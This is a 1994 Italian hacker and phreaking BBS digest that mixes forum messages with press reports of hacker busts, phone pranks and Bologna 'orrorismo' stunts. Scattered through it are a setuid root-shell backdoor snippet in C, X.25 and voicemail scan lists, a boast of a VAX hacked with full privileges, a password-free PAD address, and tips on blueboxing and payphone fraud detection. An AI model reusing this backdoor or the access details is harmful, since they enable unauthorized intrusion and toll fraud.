Servirebbe anche attrezzarsi opportunamente: c'e` nessuno che ha qualche
idea su un PC portatile compattissimo ed ancor piu` economico? La CPU
non importa, basta anche uno schifido 8086, l'importante e` che abbia un
HD da 10-20 mega e una UART 16550 a cui abbinare un pocket modem.
IT> Dai , tra Fido e da qua riuscrai a racimolare informzioni a sufficenza
Ecco un primo cross-report:
============================= CUT HERE =========================
Area: Telefonia e comunicazioni
Msg#: 290 Rec'd Date: 16 Aug 94 17:07:34
From: Stefano Zano Read: Yes Replied: Yes
To: Luca Losito Mark:
Subj: Monitoraggio cabine
Ciao, Luca! Ho letto il messaggio da te inviato a All
il 14 Aug 94 e quoto:
LL> Mi chiedevo da un po' di tempo se le cabine telefoniche siano in qualche
LL> modo "monitorate".
Si. Essendo apparecchiature accessibili a tutti (brave persone e vandali)
hanno un monitoraggio molto spinto. Ogni minima variazione dallo stato
funzionale standard viene rilevato.
L'apparecchio che si vede per la strada non e' altro che un terminale
stupido stupido. Alle spalle di questo terminale, in luoghi non accessibili,
c'e' una unita' di controllo molto sofisticata che e' in continuo
monitoraggio.
molto sof
LL> Se, per puro caso O:-), i fili che arrivano ad una cabina andassero in
LL> cortocircuito o qualcuno li tagliasse, scatterebbe l'allarme nucleare in
LL> centrale o nessuno si accorgerebbe di niente fino alla segnalazione
LL> "manuale" del guasto?
L'apparecchiatura a monte si accorge della variazione e invia in c.le
un allarme "Urgente Telefonia Pubblica". Questo allarme viene trasferito
al centro di competenza, poi li ci pensa l'essere umano a decidere cosa
fare. Il che e' tutto dire :-))
LL> Le cabine sono anche abilitate alle chiamate internazionali, ma
LL> ovviamente il contascatti parte a mitraglia: se la cosa succedesse un
LL> po' troppo spesso alla stessa cabina, potrebbero insospettirsi?
Si. Come ti dicevo prima ogni variazione anomala viene segnalata.
In questo caso il sistema a monte mette fuori servizio autonomamente
l'apparecchio per errore sugli incassi.
LL> Esiste un qualche controllo di corrispondenza tra il numero di scatti
LL> registrati per ogni cabina e le operazioni effettuate dai rispettivi
LL> lettori di schede magnetiche?
Questo non te lo so dire con esattezza, ma propenderei per il si.
Ovviamente questa e' solo la teoria o meglio, come funziona sulla carta.
La realta' e' tutta da scoprire. :-)
Ciao. Stefano -wmw-
-!- Comma_22/2+
! Origin: E le stelle stanno a guardare (2:332/416.4205)
======================== END CUT ==============================
Stefano Zano e` un dipendente di una societa` concessionaria della $ip,
che si occupa dell'installazione di centrali telefoniche: le sue
informazioni sono attendibilissime.
Ulteriori approfondimenti nei prossimi giorni.
Long live the hacking, _
| |_
|__ |_| |< |_
-!- Blue Wave/RA v2.12 [NR]
! Origin: !!DECODER BBS-- <<Power2ThePeople>> 14:00-08:00 * 2-29527597
(65:1200/1)
Msg#: 5597 Date: 24 Jul 94 17:46
From: Virtualcip Read: Yes Replied: No
To: All Mark:
Subj: Caos e reti
Hello All!
Quest'area sta diventando sempre piu' la dimostrazione tangibile di come un
sistema chaotico autorganizzato sia superiore , in quanto a complessita', alla
somma delle sue parti....
Guardate cosa succede quando un utente immette un messaggio....cio' che sembra
essere chaos (e lo e') si organizza prendendo il messaggio , plasmandolo , e
costruendo qualcosa di nuovo.....qualcosa che prima non c'era!
Questa mi sembra una cosa stupenda , forse ho letto troppi libri , ma credo che
non siamo molto lontani dalla "rete totale" o "rete mondiale"....
Potrebbe essere internet....chissa',sicuramente dovra' essere libera come non
mai,senza controlli da parte di governi , multinazionali e media
"normali"......
Solo cosi' infatti si pu
o' giungere al formarsi di una realta' nuova....
Chiamiamola "societa' telematica" , "gaia" , "rete intelligente" o come volete
voi....l'importante e', come dicevo prima , che l'intelligenza totale sara'
superiore alla somma delle singole entita' che ne fanno parte (gli utenti)....
Si formera' un "superorganismo",una mente formata da milioni di
menti......pensate alle implicazioni!
Sono cosi' tante che mi viene il mal di testa solo a pensare di farne una
piccola descrizione , quindi non la faro' .....lascio ognuno libero di
immaginarsele , poi semmai ne possiamo discutere.
Saranno sicuramente giorni di luce nel buio della storia umana.
E non siamo neanche tanto lontano da questi giorni.......
Voi che ne pensate ?
Hello....
Virtualcip
Msg#: 5916 Date: 04 Aug 94 11:20
From: Zeus Kissakie' Read: Yes Replied: No
To: All Mark:
Subj: Busts... che palle...
Dalla Stampa di oggi Mercoledi' 03/08/94 Pag 11
Milano, smascherati tre pirati informatici.
MILANO. Attraverso una serie di intercittazioni telematiche, del tutto simili a
quelle telefonich, ma effettuate su linee di interconnessioni tra computer, la
Digos di Milano ha scoperto tre giovani "pirati informatici". Sono tre ragazzi
di Milano, uno di Roma e uno di Siracusa, in eta' compresa tra i 17 e i 25
anni, ciascuno dei quali ha agito per proprio conto. Utilizzavano i piu'
disparati servizi informatici grazie ai codici segreti di una azienda alla
quale venivano poi automaticamente addebitati i costi delle "piraterie".
Voci sentite in giro...
I coinvolti di Milano non sarebbero una ma due persone.
Tutti e tre (quattro) sono stati scoperti poiche' utilizzavano
la NUI di Milano BIBXXX, nota alla scena hacking ormai da mesi
e usata da un vastissimo gruppo di persone.
I tipi erano abbastanza noti su messaggerie di tipo videotel,
quali Arkie ed altre.
Secondo altri giornali sono stati denunciati per truffa anche per
l'utilizzo un programma di blueboxing (i bene informati parlano
di bluebeep). Pare anche che la compagnia telefonica non abbia chiuso
quella via di boxing (probabilmente il paese piu' usato) per "bustare"
altre persone... quest'ultima affermazione prendetela con le molle
ma state ugualmente molto attenti. Pare che se siete su centrale
elettromeccanica corriate molti meno rischi.
La scena oggi si interroga, riflette sui rischi potenziali e reali,
e solo nei prossimi giorni sapremo qualcosa di piu'.
Un'ultima cosa: l'inchiesta pare sia partita due mesi fa, quindi
dopo quella dell'Italian Crackdown. A voi le riflessioni...
cya
Z@K
---------------------------------------
Msgr Arkimede - Un msg di Drake
bha ... prova 167823132 , sembra proprio un pad
itapac dai messaggi che da, si entra pure senza nessuna password
---------------------------------------
Pazzia in Fidonet !!!
Ä Area: [Echo] Ms-Dos Hardware ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Msg#: 3465 Date: XX Aug 94 15:06
From: Xaxxxx Xxxxxxx Read: Yes Replied: No
To: Xxxxx Xxxxxxx Mark:
Subj: Super 486DX33
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
NK4QKxx-0310071300114 <<<<<<<---------- *:D (modificata dalla Redazione !!)
^^^^^^^^^^^^^^^^^^^^^
Ciao!
cosa fa il tuo processore dopo i fatidici 30 minuti di overclock? e' una cosa
che mi preme molto perche' vorrei sapere se in caso di problemi me ne posso
accorgere o meno (con relative lugubri conseguenze...)
-!-
! Origin: Xxxxxxx Xxxxxxxxxx - XX-XX-XXXXXXX (2:XXX/XXX)
---------------------------------------
Mitt Xxxx Xxxxxxx
Data 07/01/94 21:49:15
Msg_XXX 1/2 Object:Scanning NUA
Finlandia (telecom) 02442050xx
02 pw
03 pw
05 mute
08 x25(pw)
09 OCC
11 OCC (busy)
12 mute
16 com ..poi butta fuori
23 Telebox E-mail
24 mute
25 vax
33 mute
39 Hewlett Packard
46 teletel ???
52 MHP201A
54 TELEBOX E-Mail
55 " "
69 mute
73
74 mute anche 73
75 Hewlett Packard
78 mute
82 open session HELLO
85 telebox E-Mail
86 Telebox E-Mail
99 mute
bye
---------------------------------------
Mitt Xxxxxxxxxxx
Data 09/03/94 21:38:20
Msg_XXXX 1/2 Object: Risultato & Report dello Scan.
Lo scan Sprint ha dato i seguenti risultati:
1) beccato dec server con pad che chiama quasi tutte le nazioni, purtroppo
e' lento...
2) Beccati svariati vax ed hackerato uno con full privs (e presto, udite
udite, una bella BBS con CHAT!)
Segue una lista delle aree scannate...
201 (fino a 411..cioe' 20100411)
203 fino a 588
207 fino a 21 (sembra morta)
212 fino a 1116
219 fino a 123
---------------------------------------
BBS DECODER
Area: News dai Centri Sociali
Msg#: 5172 Date: 14 Jul 94 02:15
From: mastro ciliegia Read: Yes Replied: No
To: All Mark:
Subj: L'orrorismo a Bologna
LA REPUBBLICA - BOLOGNA DI GIOVEDI' 14 LUGLIO 1994 DEDICA UN'INTERA PAGINA (!)
ALLE PROVOCAZIONI "ORRORISTE"!
Titoli a pag.I:
Budella di animali "per rompere la routine", e ora il gioco gli e' sfuggito di
mano
ATTENTI AGLI ORRORISTI
Coprono auto e bus di frattaglie. "Ma e' arte"
Un gruppo di studenti nascosti da pseudonimi si sono conosciuti attraverso il
computer, vogliono imitare i situazionisti francesi
Curoi di maiale, interiora d'animali diversi che lasciano di stucco la gente
sui mezzi pubblici, per strada, ai giardini
E c'e' chi ha deciso di seguire le loro orme. "Magari e' qualcuno che vuole
madarci dei messaggi e mettersi in contatto con noi"
di Benedetta Cucci, servizio a pag. V
e andiamo a pag.V:
CHE HORROR, L'ARTE DELLE INTERIORA
Cuori di maiale su auto e bus e ora spuntano gli imitatori
UN MACABRO giochino di societa', un divertimento splatter travestito da provo-
cazione intellettuale e' di scena a Bologna. Potremmo chiamarla "frattaglia-
mania". Cuori, cervella, interiora d'animali diversi che lasciano di stucco la
gente sugli autobus, per strada, ai giardini. Passanti distratti che vengono
colti di sorpresa da oggettini disgustosi come teste di tacchino putrefatte
sul marciapiede. Signore che si avvicinano a bambini per scoprire che stanno
giocando a biglie con teste di gatto. Situazioni e racconti che turbano per-
che', oltre a impressionare, trasformano la routine quotidiana in una sorta di
iperrealta' horror.
TESTE DI GATTO E CUORI DI MAIALE
Il primo episodio della serie risale al 27 maggio. Durante una manifestazione
di teatro di strada in via Indipendenza un ragazzo inizia a contorcersi, cade
per terra e, improvvisamente, si apre la camicia facendone uscire viscere ani-
mali. Poi, due giorn i fa, un altro fatto ugualmente trucido: il ritrovamento
di un cuore, probabilmente di maiale, legato a un albero ai giardini Margheri-
ta con un biglietto. Poi tutta una serie di racconti terrificanti che piovono
in redazione attraverso lettere. Adriano Longhini, ad esempio, racconta di a-
ver trovato il 13 giugno sull'autobus, linea 14, "un barattolo nascosto sotto
il sedile. Ne e' uscito un liquido giallastro il cui odore nauseabondo ha fat-
to storcere il naso a tutti i passeggeri". O chi, come Erich Pasetti, ha tro-
vato sul cofano della sua Rover "svariati chili di cervella animali".
Verita', esagerazioni, comuqnue c'e' una sapiente regia per questa estate
splatter. Scavi un po' e scopri che il gioco e' condotto da un gruppo di per-
sone che si sono conosciute via computer e modem. Li', nelle inconsistenti re-
ti telematiche, hanno presa vita gli happening che hanno movimentato la vita
cittadina. Michele Serra, dalle pagine di Cuore, li definisce "orroristi" e a
loro, che non vogliono svelare la propria identita' individuale, il termine va
benissimo, anche perce' non ne hanno cercato un altro per classificarsi. L'u-
nica cosa certa di questo gruppo formato perlopiu' da studenti di ingegneria,
agraria o medicina ma anche da operai, e' che, dopo l'episodio pubblico di via
Indipendenza e una lettera scritta da una falsa passante sull'accaduto, il
gioco e' sfuggito di mano a chi l'ha iniziato. Le altre lettere, come l'episo-
dio dei giardini Margherita, non sono opera loro. "Il cuore trovato ai Giardi-
ni e' stata una sorpresa anche per noi - racconta James Ellroy (pseudonimo
letterario), venticinquenne veneto, studente di lettere all'universita' di Bo-
logna e grande appassionato di teatro e romanzi polizieschi - magari si tratta
di qualcuno che vuole mandarci dei messaggi, vuole mettersi in contatto con
noi, oppure e' solo uno sberleffo per i Cattolici popolari che stanno facendo
l'happening dei giovani. Chi lo sa! E comunque, tutte le altre lettere pubbli-
cate dai giornali, potrebbero essere false oppure verissime, come falso o vero
puo' essere l'accaduto. E' difficile capirlo. Noi non ci diciamo mai quello
che facciamo, ma sappiamo benissimo quello che non facciamo.
Pare proprio che altri ci abbiano imitato".
Il progetto che sta alla base dell'intero gioco e' nato dopo una fitta conver-
sazione sul cinema splatter in un'osteria bolognese; e sarebbe semplicemente
la voglia di "creare spaesamenti in citta', nei luoghi dove c'e' molta gente",
parla ancora Ellroy, "innescare istanti in cui la gente si pone delle doman-
de, si mette a riflettere su quel momento particolare della sua vita. Si ac-
corge di stare vivendo. Solitamente, quando una persona cammina per strada,
non e' altro che un'unita' di circolazione. Fa le vasche, vive di
automatismi".
Gli affezionati della frattaglia non amano definirsi, ma certo richiamano alla
mente le gesta dei "situazionisti" degli anni cinquanta e sessanta.
"ALLARGARE LA VISIONE"
Somiglianza suggerita da Helena Velena, "hackeratrice culturale e sociale" co-
me lei si definisce, da sempre "situazionista", facendo riferimento a attivi-
ta' telematiche devianti e destabilizzatrici. "I situazionisti, nella Parigi
degli anni cinquanta, creavano eventi per vedere se era possibile creare imma-
ginario, suscitare reazioni. E lo facevano per allargare la visione della
realta'. Facevano anche della psicogeografia, ovvero davano vita alle situa-
zioni, nei diversi distretti della citta' e studiavano gli sbalzi d'umore da
zona a zona. E' quello che stanno facendo questi orroristi, o forse proprio
neosituazionisti".
Ma il club misterioso a tutto cio' non replica. Sfugge alla gabbia delle defi-
nizioni, vuole restare solo un gruppo di persone, al di fuori di schemi gene-
razionali, con anche una grande passione per il teatro. E infatti hanno ap-
prezzato molto chi li ha paragonati al gruppo teatrale "Magazzini criminali" o
Michele Serra che parla di "frequentatori di scuole di animazione teatrale".
Tutto molto sofisticato, d'accordo. Ma se capitasse al prode Ellroy di trovar-
si sul cofano una scodellata di budella fumanti ? "Mi incazzerei. Ma ne sarei
anche contento. Sono fiero delle mie emozioni".---
! Origin: ECN Bologna 39-51-260556 (45:1917/4)
-!-
! Origin: ECN BOLOGNA 59-45-260556 (45:1917/4)
SEEN-BY: 1/1 4/1 5/1 9/1 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1
SEEN-BY: 1500/1 1600/1 1800/1 1917/1 2 3 4 5 6 9 11 2000/1
---------------------------------------
Area: Dibattito CyberPunx
Msg#: 7277 Date: 29 Aug 94 22:08
From: Ice Man Read: Yes Replied: No
To: All Mark:
Subj: RAgazzo arrestato per aver "giokato" kon il 113
*****************************************************************************
Dalla stampa di Lunedi 28 Agosto:
>Catania,per 5 giorni un sedicenne ha fatto impazzire i centralini delle forze
> [dell'ordine
> M A N D A I N T I L T I L 1 1 3
>
> Polizzia beffata da un piccolo genio dell' elettronica
...Vi faccio un sunto di cosa e' successo:
"...E'bastato avere il Sirio normale apparekkio telefonico della SIP
e il servizio di conversazione a tre...
...Il ragazzino terribile prima componeva il numero di una sala operativa
e poi kuello dell' altra..."
... Direi normale amministrazione di Phreking a parteil fatto ke il "Piccolo
... genio" si sia fatto bekkare e kuesto non vorrei dare giudizi ma non mi
... sembra proprio una kosa furba,
... Dico se lui e'un genio gente ke BoXa da anni e usa dial-Out kome si
... dovrebbe sentire??? kome dio sceso in terra!?!?!
... Ma il bello viene adesso:
"...La polizia ha impiegato una settimana e sofistikate apparekkiature
per le intercettazioni telefonike per venire a capo dello strano
giallo. Poi individuata una fascia di utenza sospetta c'e' stata
una vera e propri irruzione in kasa del responsabile..."
... Ok da kui si dedukono un paio di kosette:
... 1) ke la pula ci mette 1 settimana per tracciare kon certezza una
... telefonata e la kosa mi sembra esagerata figuriamoci un iterurbana o
... una telefonata ke passa da una rete!!!!!!
... 2) Individuata "la Fascia di utenza" il ke vuol dire ke se il tipo
... smetteva un giorno prima non lo avrebbero tracciato mai piu...
... Kuesto e tutto ma si passa da un eccesso all'altro dopo lo skandalo
... kotrozzi kuesto Lama kui!!!
... Non dovrei dirlo xke' sono l'ultima persona a poterlo fare ma diko e ke
... diamine!!!!! a me sto kui mi pare proprio lama Voi ke mi dite????
... Cosa ci aspetta alle porte del 2000????? Il campanello
-!- Blue Wave/RA v2.12 [NR]
! Origin: ---> ECN_TO +39-11-6507540 <--- (45:1917/2.0)
SEEN-BY: 1/1 5/1 9/1 10/2 1000/1 4 1100/1 1200/1 2 5 6 7 1400/1 1500/3
SEEN-BY: 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1
---------------------------------------
Mitt XXXXXX
Data 16/03/94 17:24:31
Msg_XXXX 1/1 Object: semplice ma funzia...
main(argc, argv)
int argc;
char *argv<>;
<
setuid(0);
setgid(0);
argv<0> = "/bin/sh";
execvp(argv<0>, &argv<0>);
perror("exec()");
>
---------------------------------------
Msg#: 5265 Date: 16 Jul 94 10:52
From: Mastro Ciliegia Read: Yes Replied: No
To: All Mark:
Subj: ancora orrorismo a BO
da "La Repubblica - Bologna", 15/7/94
Il macabro in strada -
COSI' COLPISCE L'ORRORISTA
E con Baggio-gol esce frattaglia selvaggia -
L'altra notte l'ultimo scherzo-performance alla Villa
delle Rose. E poi quel cuore ai giardini Margherita... -
di STEFANO CASI
FRATTAGLIA selvaggia: il giochino dell'estate. Ci si procurano interiora ani-
mali dal macellaio, si abbandonano in un angolo della citta' accanto a scritte
misteriose, e ci si nasconde "per vedere di nascosto l'effetto che fa", come
direbbe Enzo Jannacci. Cosi' fanno gli "orroristi", i terroristi dell'horror.
Scherzi macabri o capolavori artistici? Il dubbio e' legittimo, ma il disgusto
rimane immutato. Ne sanno qualcosa i frequentatori dei Giardini Margherita che
hanno trovato resti animali accompagnati dal misterioso slogan "Novosibirsk
brucia". Il reperto dei Giardini margherita e' stato portato all'isituto di
medicina legale, dove il dottor Romanelli sta stilando il suo referto: "E' un
cuore animale, forse di maiale - ci spiega -, tutto avvolto da un filo di ny-
lon. E' sicuramente uno scherzo".
Uno scherzo che pero' potrebbe rivelarsi pericoloso. All'ufficio controllo del
territorio ammettono di essere stati presi un po' in contropiede dallo strano
episodio: "Stiamo aspettando il referto del medico legale e poi valuteremo
quali reati saranno stati commessi". Procurato allarme? Collocamento pericolo-
so di cose che "possano offendere o imbrattare o molestare persone", come re-
cita il codice penale? Vedremo.
Intanto il dibattito sull'identita' dei misteriosi buontemponi si allarga e si
complica. Soprattutto per la presenza sempre piu' massiccia di frattaglie e
resti animali negli eventi artistici di questi ultimi anni. Anzi, di questi
ultimi mesi. Alla fine di maggio, per esempio, Riccardo Paccosi si esib in
una performance politico-splatter in mezzo a via Indipendenza, in cui faceva
fuoriuscire viscere animali dalla giacca. Mentre nella provincia reggiana i
Pericolo Giallo fanno azioni di strada ironicamente "cruente": nell'ultima,
per esempio, un Babbo Natale frustato da una "fatalona", viene sbudellato con
grande spargimento di intestini e fegatelli. "Il nostro lavoro e' legato al
discorso politico fra esteriorita' e interiorita'", psiega Fausto Franchi, ri-
chiamandosi a esperienze artistiche come Fluxus, Nitsch e la Body-art. proprio
mentre l'Italia batteva la Bulgaria sul campo del Giants' Stadium, i Pericolo
Giallo hanno riproposto la loro performance natalizio-viscerale nel giardino
di Villa delle Rose all'interno della programmazione di "Bologna sogna", l'e-
state bolognese a cura dell'Assesorato alla cultura. Una curiosa coincidenza
con la frattaglio-mania che attanaglia la citta' in questi giorni, e che ha
ricordato il "giallo" - piu' simpatico, a dire la verita' - di alcune estati
fa, quando sui muri bolognesi apparve il disegno infantile di un'ochetta in
corsa. Quel disegno era in realta' l'intervento estetico di una coppia assurta
poi agli onori della cronaca artistica in mostre di prestigio: Cuoghi e Cor-
sello.
La mania delle frattaglie, nel frattempo, ha mosso altri buontemponi a uno
strano tipo di imitazione. Anziche' "agire", come fanno Paccosi e i Pericolo
Giallo, preferiscono scrivere di scherzi macabri inesistenti. Sperando di en-
trare a far parte di una leggenda metropolitana che, tuttavia, ha inquietanti
riscontri con la cronaca.
Come funziona? Semplice: basta raccontare uno scherzo, recuperandolo dalla me-
moria di fan non cresciuto di horror-manga o splatter-fanzine, e si psedisce
il messaggio. Per via telematica, creando scompiglio nelle reti di comunica-
zione. Oppure per posta, naturalmente non scrivendo il proprio nome, ma quello
di un altro (meglio se di persona defunta), oppure usando la carta intestata
di una ditta ignara, come e' successo con una azienda tessile alle porte di
San Lazzaro che, trovatasi ieri in questa imbarazzante situazione, sprogera'
denuncia contro ignoti.
-!-
! Origin: European Counter Network - Milano - 39-2-2840243 (45:1917/1)
SEEN-BY: 1/1 4/1 5/1 9/1 10/2 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1
SEEN-BY: 1500/1 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1
---------------------------------------
Mitt XXXXXXXXX
Data 22/06/94 16:33:44
ALLORA DICEVO AVEVO TELEFONATO IN CC AD UNA PERSONA MENTRE STAVO PARLANDO
MI SI STACCA LA SPINA DALLA PROLUNGA RIAGANCIO SUBITO LA SPINA ALZO IL
TELEFONO E MI DA LIBERO O OCCUPATO NON CI HO FATTO MOLTO CASO RIATTACO PER
RICHIAMARE LA PERSONA E IN QUEL MOMENTO IL TELEFONO MI SQUILLA E MI RITROVO
IN LINEA QUELLA PERSONA CHE NON AVEVA FATTO ALTRO CHE RESTARE IN LINEA PERCHE
NON MI AVEVA PIU SENTITO PRATICAMENTE LA CONVERSAZIONE SI E' RIATTIVATA DA
SOLA AH UN ALTRA COSA A ME OGNI TANTO MI ARRIVANO DEGLI SQUILLI E NON
RISPONDE NESSUNO MA IL FATTO STRANO E CHE SE STO COLLEGATO MI FA CADERE
COME SE FOSSE UN 197 SUCEDDE SOLO A ME O ANCHE ALTRE PERONE RICEVONO STRANI
SQUILLI DURANTE IL GG?
---------------------------------------
Msgr. Arkimede
Area Lo Sfogatoio
Mitt SYSADM
Data 17/07/94 10:02:11
Msg_792 Object: gli amici telematici
Che simpatici gli amici telematici, specialmente quando si
tratta di dialogare tramite CPE. Succede, a volte, che un utente lascia
una Cpe ad un'altro utente, dove gli chiede una qualsiasi cosa. Dopo una
settimana il destinatario di quella cpe risponde con un messaggio che fa
quasi paura: contiene un miserabile e magro "NO".
Il mittente del primo messaggio, legge quel messaggio e si rende conto che
tra le sue capacita' umane manca quella di saper abbinare quella vaga
risposta ad un suo precedente messaggio. In quel momento succede di tutto,
litiga con la madre, manda a quel paese il fratello e non telefona neppure
alla ragazza.
Momenti di estrema confuzione lo tormentano: "a che messaggio, a che
argomento sara' abbinato quel bruttissimo no?", pensa il povero utente,
che, tutto sudato, cerca tra la polvere del suo cervello ma senza darsi
una risposta.
La faccenda si conclude, tagliando il copione, con un ulteriore messaggio
di Mr. Sillabe, il quale, sorpreso di non averla ricevuta prima, sollecita
una risposta al suo tenebroso messaggio. Il povero utente ormai distrutto
dalla situazione puo' decidere, tra le seguenti, una soluzione:
1) Mandare un'altro messaggio in cpe a quell'utente, pregandolo di
ricondurlo sull'argomento dimenticato, con la probabilita' di ricascare
nel tenebroso giro e di riperdere la testa.
2) Far finta di nulla, e fregarsene come faccio Io... scrivendo in Sfogatoio
quando il problema raggiunge un numero preoccupante di casi.
3) Scrivere all'utente, pregandolo di non farsi piu' vivo nell propria cpe,
accusandolo pesantemente di aver provocato gravi danni al ns. equilibrio
mentale e di aver fatto dimenticare la parola pace nella propria famiglia.
4) Mandare una risposta a caso, magari con qualche frase ironica, ma del
tutto insignificante, prendendo esempio da Etrusco.
5) Contattare il SYSOP e fare escludere, trviare completamente l'utente dalla
messaggeria.
Morale della favola: ci vuole un po' di chiarezza nella CPE. Se io mando un
messaggio ad un utente con una domanda che esige anche soltanto un "Si" o
un "No", la relativa risposta deve contenere un mininimo di richiamo all'
argomento del messaggio a cui si risponde.
La cpe non e' una casella riservata al dialogo tra DUE persone, ma al
dialogo con PIU' persone, quindi questa routine va eseguita SEMPRE.
Se farlo vi stanca enormemente, bevete un po' di Enervit o Gatorade o fatevi
una macro!
---------------------------------------
Msg#: 5266 Date: 16 Jul 94 10:53
From: Mastro Ciliegia Read: Yes Replied: No
To: All Mark:
Subj: arte e orrorism
Trafiletto allegato all'articolo "COsi' colpisce l'orrorista":
NOSTRI ATTORI DEI MACELLI
Arte o pessimo gusto? Il critico Barilli vuol scoprire le strategie. Ci sono
precedenti.
E SE FOSSE veramente arte? "E' ancora prematuro parlarne", risponde Renato Ba-
rilli, attento studioso delle nuove tendenze artistiche. "Per il momento -
prsegue - sembrerebbero solo scherzi di pessimo gusto, senza niente di esteti-
co ne' di anti-estetico.
Ma dobbiamo attendere per capire se i ritrovamenti di frattaglie sono casuali
o rispondono a una strategia". Quel che e' certo e' che Bologna e l'Emilia Ro-
magna sono tradizionalmente al centro di eventi artistici che comportano -
letteralmente - spargimento di sangue e interiora. Proprio grazie a Barilli,
infatti, si consumo' a Bologna, in Santa Lucia, nel giugno 1977, uno degli e-
venti piu' importanti della body-art degli anni settanta, all'interno della
celebre "Settimana della performance" organizzata dalla Galleria d'arte moder-
na. L'artista era Herman Nitsch, che rovescio' sui corpi nudi di alcuni volon-
tari quintali di sangue e budella animali. Un evento-choc che fece conoscere
un'intera area geografico-artistica di cui venne data una documentazione "in-
quietante" in una mostra sull'arte austriaca a Bologna pochi anni fa. Anche in
ambito teatrale sono emerse tensioni in questo senso, a cominciare dal contro-
verso spettacolo, ambientato in un macello durante l'uccisione di un cavallo,
realizzato dai Magazzini Criminali al festival di Santarcangelo di dieci anni
fa. per continuare con le opere della cesenate Societas Raffaello Sanzio, il
cui ultimo spettacolo, "Lucifero", porta in scena quarti di bue appesi agli
uncini e teste mozzate di agnelli.
-!-
! Origin: European Counter Network - Milano - 39-2-2840243 (45:1917/1)
SEEN-BY: 1/1 4/1 5/1 9/1 10/2 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1
SEEN-BY: 1500/1 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1
---------------------------------------
Mitt. Piergiorgio
'Il Cretino' (ANSA)
BO EMILIA ROMAGNA NORD ITALIA EUROPA TIT SCOPERTO INTRUSO IN RETE TELEMATICA
MONDIALE IND CRONACA TXT ZCZC0330/RMB R CRO S0B S41 QBXJ SCOPERTO INTRUSO IN
RETE TELEMATICA MONDIALE (ANSA) -
BOLOGNA, 26 MAG - Era riuscito ad inserirsi nella principale
''autostrada elettronica'' (definizione del presidente Usa
Clinton), la Internet, fondata dal Pentagono nel '60, rivolta
prevalentemente alla ricerca scientifica e accademica,
e ora collegata a 15 milioni di computer nel mondo, di cui
20.000 in Italia. Uno dei primi ''intrusori'' italiani (all' estero
sono accaduti diversi casi) e' stato identificato da un pool guidato
dal sostituto procuratore di Bologna Riccardo Rossi e che comprendeva
gli investigatori dei carabinieri e gli esperti del Politecnico di
Milano e dell' Universita' di Parma. E' una ''matricola'' della
Facolta' di informatica della Statale di Milano, di cui non sono
state fornite le generalita' ne' dal magistrato, ne' dall'
Universita' di Bologna, che ha diffuso un comunicato. L' illecita
intrusione nella superprotetta rete elettronica (che consente
lavori integrati di elaborazione dati altrimenti impensabili)
e' stata ravvisata quasi subito, ai primi di aprile, dal Dipartimento
di Matematica di Bologna (il primo a connettersi alla rete nell' 87) e
dal Cirfid (centro di ricerca in filosofia del diritto e informatica
giuridica), sempre nel capoluogo emiliano. Il Rettore dell' Ateneo,
Fabio Roversi Monaco, ha presentato denuncia il 14 aprile e gia' il
1 maggio era stato identificato il dell' intrusore: da quel momento
sono scattate le intercettazioni telefoniche sulla sua utenza.
Queste hanno accertato gli inserimenti via ''modem'' e le
conversazioni con altri ''informaticofili'' in cui dava conto di
aver scoperto la password per entrare nel sistema. Ora rischia
cinque anni di carcere per ''accesso abusivo'' e fino a un anno e 10
milioni di multa per la diffusione a terzi del codice di accesso.
Convocato dai carabinieri di Bologna, ha detto di essersi molto
''annoiato, perche' i programmi erano tutti uguali''. Ma intanto
aveva scoperto il 70% delle parole d' ordine degli utenti Cirfid,
in meno di un mese di lavoro o, forse, di gioco. L' intrusore infatti
non ha fatto danni (avrebbe potuto cancellare o correggere interi file)
e forse si e' impadronito solo per caso del codice di un utente regolare
per poi qualificarsi come ''Root'', che e' il nome effettivo dell'
amministratore del sistema, con il quale ha cercato di scardinare un'
altra trentina di sistemi informatici italiani. Ma gli
investigatori ritengono che possa esserci lo zampino del movimento
degli Hackers, che combatte come antidemocratica la
concentrazione di dati politici economici e militari e
tende a scardinare i sistemi per rendere pubbliche le
informazioni. In Italia gli Hackers, secondo quanto riferito in
una conferenza stampa, si riconoscerebbero in una rivista,
punto di riferimento dei ''pirati'' elettronici italiani.
(ANSA).
Spero serva di lezione....
---------------------------------------
Mitt XXXXXXXXXX
Data 25/01/94 10:35:32
Msg_XXX 1/1 Object: NVI SKAN
Questo e' lo scan del segmento 1678745xx
500 VMBX
507 VMBX
509 VMBX
518 ? 4 DIGIT PROGRAM
534-535 VMBX
537 VMBX
541 MODEM 9600
542 VMBX
550 MODEM 2400
551 VMBX
555 MODEM 9600
556 VMBX
585 VMBX
---------------------------------------
Mitt Piergiorgio
Data 02/01/94 13:10:20
Msg_XXX Object: ANSA...volevate sapere di Marz
93012105150 DOCUMENT= 1 OF 4 NUMBER OF LINES = 69
DATRAS = 930121
SCELTA = GEN
IDENTIFICAZIONE__ 930121 05150
21 GEN 1993 LUO ROMA
RM LAZIO CENTRO ITALIA EUROPA
TIT ''INTRUSI NEL COMPUTER'': COME AGISCONO GLI HACKER
IND CRONACA TXT ZCZC394/0B
U CRO S0B R16 QBXB
''INTRUSI NEL COMPUTER'': COME AGISCONO GLI HACKER
(ANSA) - ROMA, 21 GEN - Veri e propri pirati dell'
informatica, gli hacker sono specializzati nel violare la
sicurezza di computer e programmi per penetrare al loro interno,
impadronendosi dei dati o danneggiandoli (vedi Ansa 073/0B e
segg). I loro obiettivi sono banche dati, informazioni riservate
di aziende ed enti pubblici o privati. A volte si impadroniscono
direttamente delle informazioni, in altri casi si limitano a
scoprire i codici segreti per entrare nei computer per venderli
o scambiarli. Questi codici sono in realta' le informazioni piu'
preziose perche' non sono soltanto la chiave per violare la
''privacy'' del computer, ma la porta per accedere alla rete
informatica alla quale sono collegati i computer e iniziare un
